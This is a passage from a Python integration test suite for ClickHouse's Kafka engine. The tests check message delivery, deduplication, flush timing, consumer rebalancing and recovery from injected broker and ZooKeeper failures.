break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(120)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="flush_by_time", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Waiting for test.kafka_consumerX to start consume ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(120)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while write prefix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Waiting for test.kafka_consumer to start consume
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
@pytest.mark.timeout(300)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(300)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before we do commit
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (<30sec) librdkafka will not report any timeout
# (alternative is to decrease the default session timeouts for librdkafka)
#
# when the delay is too long (>50sec) broker will decide to remove us from the consumer group,
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immedeately after MV creation
# reaching topic EOF.
# But we should not do flush immedeately after reaching EOF, because
# next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(180)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka Engine from an empty SELECT sub query was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
@pytest.mark.timeout(180)
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
@pytest.mark.timeout(180)
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
